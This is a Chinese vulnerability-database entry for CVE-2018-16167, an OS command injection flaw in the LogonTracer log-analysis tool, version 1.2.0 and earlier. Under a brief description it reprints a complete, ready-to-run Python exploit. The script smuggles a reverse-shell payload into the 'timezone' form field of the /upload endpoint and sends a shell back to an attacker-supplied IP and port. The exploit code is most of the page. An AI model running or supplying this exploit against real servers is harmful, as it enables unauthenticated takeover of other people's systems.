文章目录[隐藏]
LogonTracer 操作系统命令注入漏洞
| 漏洞ID | 1449910 | 漏洞类型 | 操作系统命令注入 |
| 发布时间 | 2021-06-03 | 更新时间 | 2021-06-03 |
 CVE编号 |
CVE-2018-16167 |  CNNVD-ID |
CNNVD-201901-262 |
| 漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
LogonTracer是一款可视化的Windows日志分析工具,它可以通过分析Windows Active Directory事件日志检查恶意登录。 LogonTracer 1.2.0及之前版本中存在操作系统命令注入漏洞。远程攻击者可利用该漏洞在安装了受影响的产品的服务器上执行任意操作系统命令。
|漏洞EXP
# Exploit Title: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
# Date: 29/05/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://www.jpcert.or.jp/
# Software Link: https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.0
# Version: 1.2.0 and earlier
# Tested on: Version 1.2.0 on Debian GNU/Linux 8 (jessie)
# CVE : CVE-2018-16167
import requests
import argparse
parser = argparse.ArgumentParser(description='Send a payload to a LogonTracer 1.2.0 (or earlier) server.')
parser.add_argument('aip', type=str, help='Attacker ip')
parser.add_argument('aport', type=str, help='Attacker port')
parser.add_argument('victimurl', type=str, help='Victim URL minus the path.')
args = parser.parse_args()
ATTACKER_IP = args.aip
ATTACKER_PORT = args.aport
PAYLOAD = f"python -c 'import pty,socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ATTACKER_IP}\",{ATTACKER_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'"
VICTIM_URL = args.victimurl
VICTIM_ENDPOINT = "/upload"
DATA = {
"logtype": "XML",
"timezone": f"1;{PAYLOAD};",
}
print("[!] Sending request... If your terminal hangs, you might have a shell!")
requests.post(f"{VICTIM_URL}{VICTIM_ENDPOINT}", data=DATA)
print("[*] Done. Did you get what you wanted?")|参考资料
来源:github.com
链接:https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1
来源:jvn.jp
链接:https://jvn.jp/en/vu/JVNVU98026636/index.html
本文由 华域联盟 原创撰写:华域联盟 » LogonTracer 操作系统命令注入漏洞
转载请保留出处和原文链接:https://www.cnhackhy.com/103510.htm
